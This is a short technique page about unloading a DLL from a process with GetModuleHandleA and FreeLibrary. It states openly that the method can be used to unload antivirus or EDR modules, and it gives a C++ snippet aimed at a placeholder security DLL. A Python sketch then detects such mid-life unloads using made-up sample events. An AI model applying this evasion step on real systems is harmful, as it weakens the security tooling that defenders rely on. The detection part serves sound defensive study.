Windows C++ / Unloading Module with FreeLibrary

Author: West Wind
Platform: Windows
Language: C++
Technique: Unloading Module with FreeLibrary

Description:

This code demonstrates how the GetModuleHandleA and FreeLibrary functions can be used to unload a DLL from a process's memory.

  • GetModuleHandleA retrieves a handle to a module (such as a DLL) that is already loaded.
  • FreeLibrary frees a loaded DLL from the process's memory.

This technique can be used maliciously to unload security-related DLLs used by antivirus or EDR solutions. As such, it is important to use this code ethically and responsibly, within the bounds of the law.

Code

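#include <windows.h>

int main()
{
  // Look up the handle of a DLL that is already loaded in this process.
  HMODULE hLibModule = GetModuleHandleA("av_edr_dllName.dll");
  if (hLibModule == NULL)
    return 1; // module is not loaded in this process

  // Ask the loader to release the module.
  FreeLibrary(hLibModule);
  return 0;
}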
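
On the detection side, a security DLL being unloaded from a process that keeps running is the signal to look for. The following Python sketch is an added example, not part of the original page: it assumes a feed of image load/unload and process exit events, and the event tuple layout, the sample events, the `Vendor` path and the grace window are all constructed for illustration (the DLL name is the page's placeholder).

```python
import ntpath

# The page's placeholder DLL name, lower-cased; substitute real sensor modules.
MONITORED = {"av_edr_dllname.dll"}
# Assumed window: unloads this close to process exit are normal teardown.
EXIT_GRACE_S = 2.0

# Constructed sample events: (timestamp_s, pid, event, image_path).
SAMPLE_EVENTS = [
    (100.0, 4120, "image_load", r"C:\Program Files\Vendor\av_edr_dllName.dll"),
    (100.1, 4120, "image_load", r"C:\Windows\System32\kernel32.dll"),
    (130.5, 4120, "image_unload", r"C:\Program Files\Vendor\av_edr_dllName.dll"),
    (200.0, 5000, "image_load", r"C:\Program Files\Vendor\av_edr_dllName.dll"),
    (260.0, 5000, "image_unload", r"C:\Program Files\Vendor\av_edr_dllName.dll"),
    (260.2, 5000, "process_exit", ""),
    (300.0, 4120, "image_load", r"C:\Windows\System32\ws2_32.dll"),
]


def find_sensor_unloads(events, monitored=MONITORED, grace=EXIT_GRACE_S):
    """Return (pid, timestamp, dll) for monitored DLLs unloaded mid-life."""
    # First pass: remember when each process exited (PID reuse is ignored).
    exit_time = {}
    for ts, pid, kind, _path in events:
        if kind == "process_exit":
            exit_time.setdefault(pid, ts)

    findings = []
    for ts, pid, kind, path in events:
        if kind != "image_unload":
            continue
        dll = ntpath.basename(path).lower()  # Windows paths, any host OS
        if dll not in monitored:
            continue
        ended = exit_time.get(pid)
        if ended is not None and 0 <= ended - ts <= grace:
            continue  # unload is part of normal process teardown
        findings.append((pid, ts, dll))
    return findings


if __name__ == "__main__":
    for pid, ts, dll in find_sensor_unloads(SAMPLE_EVENTS):
        print(f"ALERT pid={pid} t={ts}: {dll} unloaded while process still running")
```

On the sample data only PID 4120 is reported; PID 5000 unloads the same DLL but exits 0.2 seconds later, which the grace window treats as ordinary teardown.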

Created: March 19, 2023

Last Revised: April 22, 2024